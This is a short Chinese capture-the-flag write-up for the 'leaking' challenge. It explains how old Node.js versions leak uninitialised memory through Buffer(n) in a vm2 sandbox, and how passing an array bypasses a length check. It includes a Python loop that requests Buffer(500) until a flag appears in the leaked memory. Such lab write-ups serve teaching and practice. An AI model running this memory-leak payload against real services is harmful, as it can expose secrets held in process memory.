攻防世界——leaking

进入环境,给了一段代码

攻防世界——leaking_第1张图片

浅谈npm,vm,vm2,Node.js沙盒逃逸

这是一题是关于Node.js沙盒逃逸的。其中var { VM } = require(“vm2”);是Node.js 官方安全沙箱的库(是Node.js有关沙盒的代码)

在较早一点的 node 版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的
8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存

低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么可以构造paylaod来读取内存
req.query.data.length 的限制可以通过传入数组绕过

1.题目通过访问得到了一串代码,这段代码提示在沙箱中执行。

2.由于沙箱的隔离机制,无法执行eval()等操作系统的函数。

3.要拿到flag则需要让eval()执行。利用逃逸沙箱漏洞,从而得到flag。

看了别人的解题思路,通过脚本,找到内存泄漏时执行的eval()函数,得到flag。

import requests
import time
url = 'http://ip:port/?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        if 'flag{' in response:
            print(response)
            break

 

 

 

你可能感兴趣的:(攻防世界,javascript,前端,node.js)